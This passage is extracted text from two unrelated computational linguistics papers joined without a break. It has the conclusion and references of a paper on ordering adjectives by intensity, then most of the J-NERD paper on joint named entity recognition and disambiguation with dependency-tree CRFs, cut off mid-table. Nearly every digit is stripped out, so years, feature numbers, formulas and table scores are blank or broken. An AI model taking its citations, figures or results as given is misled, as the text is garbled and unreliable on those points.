with more web evidence to improve the process of adjective ordering in lesser- resourced languages. conclusion in this work, we have presented an approach to the challenging and little-studied task of ranking words in terms of their intensity on a continuous scale. we address the issue of sparsity of the intensity order ev- idence in two ways. first, pairwise intensity scores are computed using linguistically intuitive patterns in a very large, web-scale corpus. next, a mixed integer linear program (milp) expands on this fur- ther by inferring new relative relationships. instead of making ordering decisions about word pairs in- dependently, our milp considers the joint decision space and factors in e.g. how two adjectives relate to some third adjective, thus enforcing global con- straints such as transitivity. our approach is general enough to allow addi- tional evidence such as synonymy in the milp, and can straightforwardly be applied to other word classes (such as verbs), and to other languages (monolingually as well as cross-lingually). the overall results across multiple metrics are substan- tially better than previous approaches, and fairly close to human agreement on this challenging task. acknowledgments we would like to thank the editor and the anony- mous reviewers for their helpful feedback. references mohit bansal and dan klein. . web-scale features for full-scale parsing. in proceedings of acl . thorsten brants and alex franz. . the google web t -gram corpus version . . ldc t . thorsten brants and alex franz. . web t -gram, european languages, version . ldc t . timothy chklovski and patrick pantel. . verbo- cean: mining the web for fine-grained semantic verb relations. in proceedings of emnlp . jacob cohen. . a coefficient of agreement for nom- inal scales. educational and psychological measure- ment, ( ): – . dmitry davidov and ari rappoport. . unsuper- vised discovery of generic relationships using pattern clusters and its evaluation by automatically generated sat analogy questions. in proceedings of acl . marie-catherine de marneffe, christopher d. manning, and christopher potts. . was it good? it was provocative. learning the meaning of scalar adjectives. in proceedings of acl . gerard de melo and gerhard weikum. . towards a universal wordnet by learning from combined evi- dence. in proceedings of cikm . zhicheng dou, ruihua song, xiaojie yuan, and ji-rong wen. . are click-through data adequate for learn- ing web search rankings? in proc. of cikm . derek gross and katherine j. miller. . adjectives in wordnet. international journal of lexicography, ( ): – . vasileios hatzivassiloglou and kathleen r. mckeown. . towards the automatic identification of adjecti- val scales: clustering adjectives according to meaning. in proceedings of acl . vasileios hatzivassiloglou and kathleen r. mckeown. . predicting the semantic orientation of adjec- tives. in proceedings of acl . vasileios hatzivassiloglou and janyce m. wiebe. . effects of adjective orientation and gradability on sen- tence subjectivity. in proceedings of coling . marti hearst. . automatic acquisition of hyponyms from large text corpora. in proceedings of coling . diana inkpen and graeme hirst. . building and using a lexical knowledge base of near-synonym dif- ferences. computational linguistics, ( ): – . maurice g. kendall. . a new measure of rank cor- relation. biometrika, ( / ): – . adam kilgarriff. . googleology is bad science. computational linguistics, ( ). william h. kruskal. . ordinal measures of associa- tion. journal of the american statistical association, ( ): – . jingjing liu and stephanie seneff. . review senti- ment scoring via a parse-and-paraphrase paradigm. in proceedings of emnlp . george a. miller. . wordnet: a lexical database for english. communications of the acm, ( ): – . said m. mohammad, bonnie j. dorr, graeme hirst, and peter d. turney. . computing lexical contrast. computational linguistics. bo pang and lillian lee. . opinion mining and sentiment analysis. foundations and trends in infor- mation retrieval, ( - ): – , january. peter f. schulam and christiane fellbaum. . au- tomatically determining the semantic gradation of ger- man adjectives. in proceedings of konvens . vera sheinman and takenobu tokunaga. . adjs- cales: visualizing differences between adjectives for language learners. ieice transactions on information and systems, ( ): – . vera sheinman, takenobu tokunaga, i. julien, p. schu- lam, and c. fellbaum. . refining wordnet adjec- tive dumbbells using intensity relations. in proceed- ings of global wordnet conference . rion snow, daniel jurafsky, and andrew y. ng. . semantic taxonomy induction from heterogenous evi- dence. in proceedings of coling/acl . charles spearman. . the proof and measurement of association between two things. the american journal of psychology, ( ): – . fabian m. suchanek, mauro sozio, and gerhard weikum. . sofie: a self-organizing framework for information extraction. in proceedings of www . maite taboada, julian brooke, milan tofiloskiy, and kimberly vollz. . lexicon-based methods for sentiment analysis. computational linguistics. niket tandon and gerard de melo. . information extraction from web-scale n-gram data. in proceed- ings of the sigir web n-gram workshop. peter d. turney and michael l. littman. . mea- suring praise and criticism: inference of semantic orientation from association. acm trans. inf. syst., ( ): – , october. peter d. turney. . a uniform approach to analogies, synonyms, antonyms, and associations. in proceed- ings of coling . xiaofeng yang and jian su. . coreference resolu- tion using semantic relatedness information from auto- matically discovered patterns. in proceedings of acl . ainur yessenalina and claire cardie. . composi- tional matrix-space models for sentiment analysis. in proceedings of emnlp . j-nerd: joint named entity recognition and disambiguation with rich linguistic features abstract methods for named entity recogni- tion and disambiguation (nerd) perform ner and ned in two separate stages. therefore, ned may get penalized by ner false positives, and suffers in re- call by false negatives. conversely, ned does not fully exploit information com- puted by ner such as types of men- tions. this paper presents j-nerd, a new approach to perform ner and ned jointly, by means of a probabilistic graph- ical model that captures mention spans, mention types, and the mapping of men- tions to entities in a knowledge base. we present experiments with different kinds of texts from the conll’ , ace’ , and clueweb’ -facc corpora. j-nerd consistently outperforms state-of-the-art competitors in end-to-end nerd preci- sion, recall, and f . introduction motivation: methods for named entity recog- nition and disambiguation, nerd for short, typi- cally proceed in two stages: • at the ner stage, text spans of entity men- tions are detected and tagged with coarse- grained types like person, organization, loca- tion, etc. this is typically performed by a trained conditional random field (crf) over word sequences (e.g., (finkel et al., )). • at the ned stage, mentions are mapped to entities in a knowledge base (kb) based on contextual similarity measures and the seman- tic coherence of the selected entities (e.g., (cucerzan, ; hoffart et al., ; ratinov et al., )). this two-stage approach has limitations. first, ner may produce false positives that can mis- guide ned. second, ner may miss out on some entity mentions, and ned has no chance to com- pensate for these false negatives. third, ned is not able to help ner, for example, by disambigua- tion “easy” mentions (e.g., of prominent entities with more or less unique names) and then using the entities and knowledge about them as enriched features for ner. example: consider the following sentences: david played for manu, real, and la galaxy. his wife posh performed with the spice girls. this is difficult for ner because of the absence of upper-case spelling, which is not untypical in social media, for example. most ner methods will miss out on multi-word mentions or words that are also common nouns (“spice”) or adjec- tives (“posh”, “real”). typically, ner would pass only the mentions “david”, “manu”, and “la” to the ned stage, which then is prone to many errors like mapping the first two mentions to any promi- nent people with first names david and manu, and mapping the third one to the city of los ange- les. with ner and ned performed jointly, the possible disambiguation of “la galaxy” to the soc- cer club can guide ner to tag the right mentions with the right types (e.g., recognizing that “manu” could be a short name for a soccer team), which in turn helps ned to map “david” to the right entity david beckham. contribution: this paper presents a novel kind of probabilistic graphical model for the joint recogni- tion and disambiguation of named-entity mentions in natural-language texts. with this integrated ap- proach to nerd, we aim to overcome the limi- tations of the two-stage ner/ned methods dis- cussed above. our method, coined j-nerd , is based on a supervised, non-linear crf that combines multi- ple per-sentence crf’s into an entity-coherence- aware global crf. the global crf detects men- tion spans, tags them with coarse-grained types, and maps them to entities in a single joint- inference step based on gibbs sampling. the j-nerd method comprises the following novel contributions: • a tree-shaped crf for each sentence, whose structure is derived from the dependency parse tree and thus captures linguistic context in a deeper way compared to prior work with crf’s for ner and ned; • richer linguistic features not considered in prior work, harnessing dependency parse trees and verbal patterns that indicate mention types as part of their nsubj or nobj arguments; • an inference method that maintains the un- certainty of both mention candidates (i.e., to- ken spans) and entity candidates for competing mention candidates and makes joint decisions, as opposed to fixing mentions before reason- ing on their disambiguation. we present experiments with three major datasets: the conll’ collection of newswire articles, the ace’ corpus of news and blogs, and the clueweb’ -facc corpus of web pages. baselines that we compare j-nerd with include aida-light (nguyen et al., ), spotlight (daiber et al., ), and tagme (ferragina and scaiella, ), and the recent joint ner/ned method of durrett and klein ( ). j-nerd consistently outperforms these competitors in terms of both precision and recall. the j-nerd code and all experi- mental data are publicly available at the url anonymized-for-doubleblind-review. related work ner: detecting the boundaries of text spans that denote named entities has been mostly addressed by supervised crf’s over word sequences (mc- callum and li, ; finkel et al., ). the work of ratinov and roth ( ) improved these techniques by additional features from context ag- gregation and external lexical sources (gazetteers, etc.). passos et al. ( ) harnessed skip-gram features and external dictionaries for further im- provement. an alternative line of ner techniques is based on dictionaries of name-entity pairs, in- cluding nicknames, short-hand names, and para- phrases (e.g., “the first man on the moon”). the work of ferragina (ferragina and scaiella, ) and mendes (mendes et al., ) are examples of dictionary-based ner. the work of spitkovsky and chang ( ) is an example for a large-scale dictionary that can be harnessed by such methods. an additional output of the crf’s are type tags for the recognized word spans, typically limited to coarse-grained types like person, organization, and location (and also miscellaneous). the most widely used tool of this kind is the stanford ner tagger (finkel et al., ). many ned tools use the stanford ner tagger for their first stage of detecting mentions. mention typing: the specific ner of inferring semantic types has been further refined and ex- tended by various works on fine-grained typing (e.g., politicians, musicians, singers, guitarists) for entity mentions and general noun phrases (fleis- chman and hovy, ; rahman and ng, ; ling and weld, ; yosef et al., ; nakas- hole et al., ). most of this work is based on supervised classification, using linguistic features from mentions and their surrounding text. one exception is the work of nakashole et al. ( ) which is based on text patterns that connect enti- ties of specific types, acquired by sequence mining from the wikipedia full-text corpus. in contrast to our work, these are simple surface patterns, and the task addressed here is limited to typing noun phrases that likely denote emerging entities that are not yet registered in a kb. ned: methods and tools for ned go back to the seminal works of (dill et al., ; bunescu and pasca, ; cucerzan, ; milne and witten, ). more recent advances led to open-source tools like the wikipedia miner wikifier (milne and witten, ), the illinois wikifier (ratinov et al., ), spotlight (mendes et al., ), se- manticizer (meij et al., ) tagme (ferragina and scaiella, ; cornolti et al., ), and aida (hoffart et al., ) with its improved vari- ant aida-light (nguyen et al., ). we choose some, namely, spotlight, tagme and aida-light, as baselines for our experiments. these are the best-performing, publicly available systems for news and web texts. most of these methods com- bine contextual similarity measures with some form of considering the coherence among a se- lected set of candidate entities for the disambigua- tion. the latter aspect can be cast into a variety of computational models, like graph algorithms (hoffart et al., ), integer linear programming (ratinov et al., ), or probabilistic graphical models (kulkarni et al., ). all these methods use the stanford ner tagger or dictionary-based matching for their ner stages. kulkarni et al. ( ) uses an ilp or lp solver (with rounding) for the ned inference, which is computationally expensive. note that some of the ned tools aim to link not only named entities but also general concepts (e.g. “world peace”) for which wikipedia has articles. in this paper, we solely focus on proper entities. joint nerd: there is little prior work on per- forming ner and ned jointly. (sil and yates, ; durrett and klein, ) are the most no- table methods. sil and yates ( ) first com- piles a liberal set of mention and entity candidates, and then performs joint ranking of the candidates. durrett and klein ( ) presents a crf model for coreference resolution, mention typing, and mention disambiguation. our model is also based on crf’s, but distinguishes itself from prior work in three ways: ) tree-shaped per-sentence crf’s derived from dependency parse trees, as opposed to merely having connections among mentions and entity candidates; ) linguistic features about ver- bal phrases from dependency parse trees; ) main- taining candidates for both mentions and entities and jointly reasoning on their uncertainty. our ex- periments include comparisons with the method of (durrett and klein, ). there are also benchmarking efforts on mea- suring the performance for end-to-end nerd (cornolti et al., ; carmel et al., ; us- beck et al., ), as opposed to assessing ner and ned separately. however, to the best of our knowledge, none of the participants in these com- petitions considered integrating ner and ned. overview of the j-nerd method for labeling the token sequence 〈tok , . . . , tokm〉 with mention boundaries, ner types, and ned entities, we have devised different kinds of graph- ical models (koller et al., ). while state-of- the-art methods like the stanford ner tagger em- ploy a linear-chain crf (sutton and mccallum, ) for this task, we use more sophisticated tree- shaped models whose structure is obtained from dependency parse trees. the per-sentence crf’s are then combined into a global model by adding cross-sentence dependencies whenever the same token sequence appears as mention candidates in several sentences. figure gives an example of a global crf for two sentences. these crf models use a variety of features. some of these are fairly standard for ner/ned, whereas others are novel contributions of this pa- per: • standard features include lexico-syntactic properties of tokens like pos tags, matches in dictionaries/gazetteers, and similarity mea- sures between token strings and entity names. also, entity-entity coherence is an important feature for ned – not exactly a standard fea- ture, but used in some prior works. • features about the topical domain of an input text (e.g., politics, sports, football, etc.) are obtained by a classifier based on “easy men- tions”: those mentions for which the ned de- cision can be made with very high confidence without advanced features. the use of do- mains for ned was introduced by (nguyen et al., ). here we further extend this tech- nique by harnessing domain features for joint inference on ner and ned. • the most advanced feature group captures typed dependencies from the sentence pars- ing. such features have not been used in prior work. the feature space of j-nerd is presented in de- tail in section ; the graphical models and their learning and inference methods are further dis- cussed in section . in the rest of this section we introduce various building blocks that j-nerd uses for preprocess- ing inputs and for computing features. . language processing we employ the stanford corenlp tool suite (nlp.stanford.edu/software/corenlp.shtml) for processing input documents. this includes tokenization, sentence detection, pos tagging, lemmatization, and dependency parsing. all of these provide features for our crf model. in particular, we harness dependency types between noun phrases (de marneffe et al., ), like nsubj, dobj, prep in, prep for, etc. . entity repository and name-entity dictionary we utilize a large knowledge base, namely, yago (hoffart et al., ), as an entity repo- sitiory and as a major source of a dictionary of name-entity pairs (aliases incl. paraphrases). for the latter, we import the yago means and hasname relations, a total of more than mil- lion name-entity pairs (for ca. million distinct entities). we also derive ner-type-specific phrase dictionaries. to this end, we also import sup- porting phrases from gate (cunningham et al., ), e.g., “mr.”, “mrs.”, “dr.”, “president”, etc. for the type person, “city”, “river”, “park”, etc. for the type location, “company”, “institute”, “inc.”, “ltd.”, etc. for the type organization. context statistics: to compute values for the features described in section , we obtain statis- tics for different kinds of contexts for tokens and candidate entities. we distinguish two kinds of contexts: i) based on other tokens, and ii) based on patterns of parsing dependencies; these are represented as a bag-of-words or a bag-of- linguistic-patterns, respectively, each with tf-idf scores. here tf denotes token frequencies and idf denotes inverse document frequencies (croft et al., ). the tf values are obtained from the in- put document at hand; the idf values are estimated from a large wikipedia text dump. token context of tokens. for a given token toki, all tokens tokj in the same input document form the token context and are associated with their tf- idf scores. thus, all tokens in the same document have identical token contexts. linguistic context of tokens. for all pars- ing dependencies, in which a token toki oc- curs, we treat the dependency type and the other argument of the dependency as linguistic pat- terns and compute their frequencies in the doc- ument (tf) and their inverse document frequen- cies in the wikipedia corpus (idf). in the ex- ample sentence “david played for manu, real, and la galaxy”, the linguistic context of the to- ken “manu” consists of the stanford parser depen- dencies prep for[played, manu], conj and[manu, real], and conj and[manu, galaxy]. this leads to the patterns prep for[played, ∗], conj and[∗, real], and conj and[∗, galaxy] with wildcards ∗, for which we compute tf-idf scores. token context of entities. for each candidate entity enti, we extract all tokens from keyphrases associated with enti and compute tf-idf scores for these tokens. the keyphrases are distilled from wikipedia link anchor texts (hoffart et al., ) and are part of the yago knowledge base. for example, the entity david beckham has keyphrases such as “player of the year”, “cham- pions league final”, “manchester united”, etc. thus, we compute tf-idf statistics for tokens like “player”, “year”, “champions”, etc. linguistic context of entities. for a candi- date entity enti, we extract all linguistic pat- terns (with tf-idf scores) where enti occurs from the wikipedia corpus. the result of parsing the wikipedia corpus by a dependency tool is saved in our database. . mention candidates & entity candidates to determine the candidate mentions in a token se- quence, we first perform exact-match lookups of all sub-sequences against the name-entity dictio- nary. as an option (and by default), this can be limited to sub-sequences that are tagged as noun phrases by the stanford parser. for higher recall, we then add partial-match lookups where a token sub-sequence matches only some but not all to- kens of an entity name in the dictionary. for ex- ample, for the sentence “david played for manu, real and la galaxy”, we obtain “david”, “manu”, “real”, “la galaxy”, “la”, and “galaxy” as candi- date mentions. this process yields features; our crf model then learns how to determine the ac- tual mention boundaries. the entity candidates then are simply all enti- ties that are associated with at least one of the can- didate mentions. as we include highly ambigu- ous mentions and the knowledge base contains thousands of candidate entities for some mentions, we use pruning heuristics to restrict the candidate space. for each candidate mention, we consider only the top k (using k = in our experiments) highest ranked entities. the ranking is based on the string similarity between the mention and the primary entity name, the prior popularity of the en- tity, and the local context similarity (feature func- tions f ,f ,f in section ). for each candidate mention, we add a virtual entity out-of-kb (out of knowledge base) to the entity candidate space, to prepare for the possi- ble situation that the mention actually denotes an emerging or long-tail entity that is not contained in the knowledge base at all. we compute the token context of a mention-specific out-of-kb entity, for a given mention token toki, based on the method of (hoffart et al., ). first, we form the set union of the token contexts of all candidate entities for toki, and subtract this union from the token context of toki. second, we compute tf-idf scores for the remaining tokens, using the idf esti- mates from wikipedia (as for all other tokens) and setting tf to (as the out-of-kb entity is not observable). feature space we define feature templates f –f for computing the ner type and the ned label of a token toki that denotes or is part of a mention. the bound- aries of a mention, i.e., its token span, are then triv- ially derived by combining adjacent tokens with the same ner type label (and disregarding all to- kens with label “other”). let posi be the pos tag of toki, dici is the ner tag from the dictionary lookup of toki, and depi is the parsing dependency that con- nects toki with another token. we write suri = 〈toki− , toki, toki+ 〉 to refer to the sequence of tokens surrounding toki. if lemmatization is en- abled, toki can be replaced by lemi. next, let ci be the set of candidate entities for all possible mentions that contain token toki. finally, let d be the domain which the input text is classified into (see section ) for a given training corpus (e.g., the conll- yago training set), the feature templates are expanded into concrete features, considering also background dictionaries and knowledge-base statistics. some of these are boolean fea- tures, others are real-valued. the boolean fea- tures (f ,f ,f ,f ,f ,f ,f ,f ,f ) capture the presence or absence of features like tokens, pos tags, dependency types, dictionary entries in a given input document on which we want to run end-to-end nerd. the real-valued features (f ,f ,f ,f ,f ,f ,f ,f ) capture similar- ity and relatedness measures between tokens, do- mains, or entities; these measures are precom- puted on background resources like dictionaries and knowledge bases. these features are partic- ularly crucial for ned, which needs to cope with many thousands of possible output labels (the en- tities for the mentions in a text). . standard features token-type prior. this feature f captures a prior probability of toki being of ner type typej. these probabilities are estimated from ner-annotated corpora. in our experiments, we use the training subsets of different test corpora, where training and test data are disjoint. for exam- ple, we may have a prior f (“ltd.”, org) = . . current pos. the feature template f (toki,posi, typej) generates binary fea- tures for all training-corpus tokens toki with part-of-speech tag posi and ner label typej. for the same token, multiple features may be generated: for example, if token “real” occurs in the training corpus in the phrase “real (jj) madrid (nn)”, this generates features f (toki, jj, org) and f (toki, jj, loc), etc. when later observing token toki in an input document, the feature (toki,posi, typej) is set to if toki has pos tag posi and typej is one of the corresponding ner types in the training corpus. in the rest of this section, binary features are generated from feature templates analogously. in-dictionary. the feature template f (toki,dici, typej) generates binary features if toki is in the name-entity dictionary for some entity of ner type typej. uppercase. the feature template f (toki, typej) generates binary features if toki appears in upper- case form and is ner-labeled as typej in the train- ing corpus. surrounding pos. the feature template f (toki,suri, typej) generates binary features if token toki and the pos tag sequence of its surrounding tokens suri appear in the training corpus where toki has ner label typej. surrounding tokens. the feature template f (toki,suri, typej) generates binary features if token toki has ner type typej given that toki ap- pears with surrounding tokens suri in an ner- annotated training corpus. this could possibly lead to a huge number of features. for tractabil- ity, we thus ignore sequences that only occur once in the training corpus. surrounding in-dictionary. the feature tem- plate f (toki,suri, typej) performs dictionary lookups for surrounding tokens in suri. similar to f , it generates binary features if toki and the dictionary lookup sequence of its surrounding to- kens suri appear in the training corpus where toki has ner type typej. token-entity prior. the real-valued feature f captures a prior probability of toki being entity entj. the probabilities are estimated from the occurrence frequencies of name-entity pairs in the background corpus, harnessing link anchor texts in wikipedia. for example, we may have a prior f (“beckham”,david beckham) = . as he is more popular (today) than his wife victoria. on the other hand, f (“david”,david beckham) would be lower than f (“david”,david bowie), for example, as this still active pop star is more frequently and prominently mentioned than the retired football player. token-entity n-gram similarity. the real- valued feature f measures the jaccard similar- ity of character-level n-grams a name in the dic- tionary that includes toki and the primary (i.e., full and most frequently used) name of an en- tity entj. for example, for n = the value of f (“becks”,david beckham) is . in experi- ments we set n = . token-entity token contexts. the real-valued feature f measures the weighted overlap similar- ity between the token contexts (tok-cxt) of token toki and entity entj. we use a weighted gener- alization of the standard overlap coefficient, wo, between two sets x,y of weighted elements, xk and yk. wo(x,y ) = ∑ k min(xk,yk) min( ∑ k xk, ∑ k yk) for our setting of token contexts, the weights are tf-idf scores, hence: f (toki,entj) = wo ( tok-cxt(toki), tok-cxt(entj) ) entity-entity token coherence. the real-valued feature f measures the coherence between the token contexts of two entity candidates enti and entj. f (toki,entj) = wo ( tok-cxt(enti), tok-cxt(entj) ) for example, entities david beckham and manchester united are highly coherent as they share many tokens in their contexts, such as “champions”, “league”, “premier”, “cup”, etc. thus, they should be chosen together. . domain features we use wordnet domains, created by (miller, ; magnini and cavagli, ; bentivogli et al., ), to construct a hierarchical taxonomy of domains such as politics, economy, sports, sci- ence, medicine, biology, art, music, etc. we com- bine the domains with semantic types (classes of entities) provided by yago , by assigning them to their respective domains. this is based on the manual assignment of wordnet synsets to do- mains by (magnini and cavagli, ; bentivogli et al., ), and extends to additional types in yago . for example, singer is assigned to mu- sic, and football player to football, a sub-domain of sports. these types include the standard ner types person (pers), organization (org), loca- tion (loc), and miscellaneous (misc) which are further refined by the yago subclassof hierar- chy. in total, the domains are enhanced with ca. , types imported from yago . j-nerd classifies input texts onto domains by means of “easy mentions”. an easy mention is a match in the name-entity dictionary for which there are at most three candidate entities (nguyen et al., ). although the mention set is not ex- plicitly given before running nerd, j-nerd still can extract “easy mentions” from the entirety of all mention candidates. let c∗ be the set of candidate entities for easy mentions in the input document. for each domain d, we compute the coherence of the easy mentions m∗ = {m ,m , . . .} coh(m∗) = |c∗ ∩cd| |c∗| where cd is the set of all entities under domain d. we classify the document into the domain with the highest coherence score. although, the mentions and their entities may be inferred incorrectly, the domain classification still tends to work very reliably as it aggregates over all “easy” mention candidates. the following feature templates exploit domains. entity-domain coherence. this feature captures the coherence between an entity candidate entj and the domain d which the input text is classified into. that is, f (d,entj) = if d ∈ dom(entj). otherwise, the feature value is . entity-entity type coherence. this feature computes the relatedness between the wikipedia categories of two candidate entities enti ∈ ci, entj ∈ cj. f (enti,entj) = maxcu∈cat(enti) cv∈cat(entj) rel(cu,cv) where the function rel(cu,cv) computes the re- ciprocal length of the shortest path between cat- egories cu,cv in the domain taxonomy (nguyen et al., ). recall that our domain taxonomy con- tains hundred thousands of wikipedia categories integrated in the yago type hierarchy. . linguistic features linguistic pattern from dependency parsing. recall that we obtain dependency-parsing patterns by using wikipedia as a large background corpus. here we harness that wikipedia contains many mentions with explicit links to entities and that the knowledge base provides us with the ner types for these entities. typed-dependency. the feature template f (toki,depi, typej) generates binary features if the background corpus contains the pattern depi = deptype(arg ,arg ) where toki is ei- ther arg or arg and toki is labeled with ner type typej. for example, with token “manu” in our example sentence “david played for manu, real, and la galaxy”, a feature gener- ated from a similar sentence in wikipedia would be f (toki, prep for(“played”,∗), org). typed-dependency/pos. this feature template f (toki,posi,depi, typej) captures linguistic patterns that combine parsing dependencies (like in f ) and pos tags (like in f ), learned from an annotated training corpus. it generates binary features if toki appears in the dependency pattern depi with pos tag posi and this configuration also occurs in the training data with ner label typej. typed-dependency/in-dictionary. the feature template f (toki,dici,depi, typej) captures lin- guistic patterns that combine parsing dependen- cies (like in f ) and dictionary lookups (like in f ), learned from an annotated training corpus. it generates binary features if toki appears in the de- pendency pattern depi and has an entry dici in the name-entity dictionary for some entity with ner label typej. token-entity linguistic contexts. the real- valued feature f measures the weighted overlap between the linguistic contexts (ling-cxt) of token toki and entity entj. f (toki,entj) = wo ( ling-cxt(toki), ling-cxt(entj) ) graphical models the crf models that j-nerd uses for its infer- ence are initially constructed on a per-sentence ba- sis. these local crf’s are then combined into a global model by adding non-local links to capture cross-sentence dependencies (finkel et al., ) among mentions in different sentences (as illus- trated in figure ). . linear-chain model in the local setting, j-nerd works on each sen- tence s = 〈tok , . . . , tokm〉 separately. we con- struct a linear-chain crf (see figure ) by intro- ducing an observed variable xi for each token toki that represents a proper word. for each xi, we ad- ditionally introduce a variable yi representing the combined nerd labels. as in any crf, the xi,yi and yi,yi+ pairs are connected via factors, whose weights we obtain from the feature functions de- scribed in section . y y y y y y x x x x x x david played manu real la galaxy figure : linear-chain crf. . tree model the factor graph for the tree model (see figure ) extends the linear-chain model by adding a factor linking each pair of labels yi,yj whenever these tokens have a typed dependency obtained from the stanford parser. figure shows an example for the tree-shaped model. y y y y y y x x x x x x david played manu real la galaxy [nsubj] [p f] [p f] [p f] [det] figure : tree model. ([p f] is [prep for]) . global models following (finkel et al., ) for the global setting, we consider an entire input text, con- sisting of multiple sentences s , . . . ,sn = 〈tok , . . . , tokm〉, for the construction of both the linear-chain model and the tree model. as shown in figure , cross-sentence edges among pairs of labels yi,yj are introduced for candidate sets ci,cj that share at least one candidate entity, such as “david” and “david beckham”. additionally, we introduce factors for all pairs of tokens in adja- cent mentions within the same sentence, such as “david” and “manu”. . inference & learning for a given sequence of observed variables 〈x , . . . ,xm〉, let l denote a sequence of nerd labels 〈y , . . . ,ym〉, where each yi consists of an ner type typei and an ned label enti. our in- ference objective is to find the most probable se- quence l∗. this goal is expressed by the follow- ing function: l∗ = arg max y ...ym exp ( m∑ t= k∑ k= λk featurek(yt,yprev(t),x . . .xm) ) where yi yi yi yi yi yi xi xi xi xi xi xi david played manu real la galaxy yj yj yj yj yj xj xj xj xj xj david beckham born london england [nsubj] [p f] [p f] [p f] [det] [nn] [nn] [nsubjpass] [prep in] figure : global model, linking two tree models. ([p f] is [prep for]) • feature ..k are features generated from fea- ture templates f .. of section , • prev(t) is the index of the label yj that yt de- pends on, i.e., the previous index (t − ) in linear-chain models or the parent index in tree models, • and λk are feature weights, i.e., model param- eters to be learned. the number of generated features, k, depends on the training corpus and the choice of the crf model. for the conll-yago training set, the tree models have k = , parameters. given a trained model, exact inference with respect to the above objective function can be efficiently per- formed by variants of the viterbi algorithm (sut- ton and mccallum, ) for the local models, both linear and tree models. for the global mod- els, however, exact solutions are computationally intractable. therefore, we employ gibbs sampling to approximate the solution. as for model parameters, j-nerd learns the feature weights λk from the training data by max- imizing a respective conditional likelihood func- tion (sutton and mccallum, ), using a variant of the l-bfgs optimization algorithm (liu and nocedal, ). we do this for each local crf model (linear and tree models), and apply the same learned weights to the corresponding global mod- els. our implementation uses the riso toolkit for belief networks. experiments . setup . . test data collections our evaluation is mainly based on the conll- yago corpus of newswire articles. additionally, we report on experiments with an extended version of the ace- corpus and a large sample of the entity-annotated clueweb’ -facc web crawl. conll-yago is derived from the conll- http://riso.sourceforge.net/ yago corpus (hoffart et al., ) by remov- ing tables where mentions in table cells do not have linguistic context, a typical example being sports results. the resulting corpus contains , documents with , mentions including , out-of-kb entities. ground-truth entities in yago are provided by (hoffart et al., ). for consistent ground-truth, we derived the ner types from the ned ground-truth entities, this way fix- ing some errors in the original annotations related to metonymy (e.g., labeling the mentions in “india beats pakistan : ” incorrectly as loc, whereas the entities are the sports teams of type org). this makes the dataset not only cleaner but also more demanding, as metonymous mentions are among the most difficult cases. for the evaluation we use the “testb” subset of conll-yago, which – after the removal of ta- bles – has documents with , mentions including , out-of-kb entities. the other , documents with a total of , mentions (including , out-of-kb mentions) are used for training. ace is an extended variant of the ace cor- pus , with additional ned labels by (bentivogli et al., ). we consider only proper entities and exclude mentions of general concepts such as “revenue”, “world economy”, “financial crisis” etc., as they do not correspond to individual enti- ties in a knowledge base. this reduces the number of mentions, but gives the task a crisp focus. we disallow overlapping mention spans and consider only maximum-length mentions, following the ra- tionale of the erd challenge . the test set contains documents with , mentions. clueweb contains two randomly sampled subsets of the clueweb’ -facc corpus with freebase annotations: https://www.mpi-inf.mpg.de/departments/ databases-and-information-systems/research/ yago-naga/aida/downloads/ http://projects.ldc.upenn.edu/ace/ http://lemurproject.org/clueweb /facc / • clueweb: , documents ( , men- tions) each with at least entities . • clueweblong−tail: , documents ( , mentions) each with at least long-tail enti- ties. we consider an entity to be “long-tail” if it has at most incoming links in the english wikipedia. note that these web documents are very different in style from the news-centric articles in conll and ace. also note that the entity markup is au- tomatically generated, but with emphasis on high precision. so the data captures only a small subset of the potential entity mentions, and it may contain a small fraction of false entities. in addition to these larger test corpora, we ran experiments with several small datasets used in prior works: kore (hoffart et al., ), msnbc (cucerzan, ), and a subset of aquaint (milne and witten, ). each of these has only a few hundred mentions, but they exhibit different characteristics. the findings on these datasets are fully in line with those of our main experiments; hence no explicit results are presented here. in all these test datasets, the ground-truth con- siders only individual entities and excludes gen- eral concepts, such as “climate change”, “har- mony”, “logic”, “algebra”, etc. these proper enti- ties are identified by the intersection of wikipedia articles and yago entities. this way, we fo- cus on nerd. systems that are designed for the broader task of “wikification” are not penalized by their (typically lower) performance on inputs other than proper entity mentions. . . methods under comparison we compare j-nerd in its four variants (linear vs. tree and local vs. global) to various state-of- the-art ner/ned methods. for ner (i.e., mention boundaries and types) we use the recent version . . of the stanford ner tagger (finkel et al., ) as a base- line. this version has ner benchmark results on conll’ that are as good as those reported in ratinov and roth ( ) and passos et al. ( ). we retrained this model by using the same corpus- specific training data that we use for j-nerd . for ned, we compared j-nerd against the following methods for which we obtained open- source software or could call a web service: nlp.stanford.edu/software/crf-ner.shtml • berkeley-entity (durrett and klein, ) is a joint model for coreference resolution, ner and ned with linkage to wikipedia. • aida-light (nguyen et al., ) is an opti- mized variant of the aida system (hoffart et al., ), based on yago . it uses the stan- ford tool for ner. • tagme (ferragina and scaiella, ) is a wikifier that maps mentions to entities or con- cepts in wikipedia. it uses a wikipedia- derived dictionary for ner. • spotlight (mendes et al., ) links mentions to entities in dbpedia. it uses the lingpipe dictionary-based chunker for ner. some systems use confidence thresholds to de- cide on when to map a mention to out-of-kb. for each dataset, we used withheld data to tune these system-specific thresholds. figure il- lustrates the sensitivity of the thresholds for the conll-yago dataset. figure : f for varying confidence thresholds. . . evaluation measures we evalute the output quality at the ner level alone and for the end-to-end nerd task. we do not evaluate ned alone, as this would require giv- ing a ground-truth set of mentions to the systems under test to rule out that ner errors affect ned. most competitors do not have interfaces for such a controlled ned-only evaluation. each test collection has ground-truth annota- tions (g) consisting of text spans for mentions, ner types of the mentions, and mapping men- tions to entities in the kb or to out-of-kb. re- call that the out-of-kb case captures entities that are not in the kb at all. let x be the out- put of system x: detected mentions, ner types, ned mappings. following the erd chal- lenge (carmel et al., ), we define precision and recall of x for end-to-end nerd as: prec(x) = |x agrees with g| |x| rec(x) = |x agrees with g| |g| where agreement means that x and g overlap in the text spans (i.e. have at least one token in common) for a mention, have the same ner type, and have the same mapping to an entity or out-of-kb. the f score of x is the harmonic mean of precision and recall. for evaluating mention boundary detection alone, we consider only the overlap of text spans; for evaluating ner completely, we consider both mention overlap and agreement on ner type. . results for conll-yago our first experiment on conll-yago is com- paring the four crf variants of j-nerd for three tasks: mention boundary detection, ner typing and end-to-end nerd. then, the best model of j-nerd is compared against various baselines and a pipelined configuration of our method. fi- nally, we test the influence of different features groups. . . experiments on crf variants table : experiments on conll-yago . perspective variants prec rec f mention boundary detection j-nerdlinear-local . . . j-nerdtree-local . . . j-nerdlinear-global . . . j-nerdtree-global . . . ner typing j-nerdlinear-local . . . j-nerdtree-local . 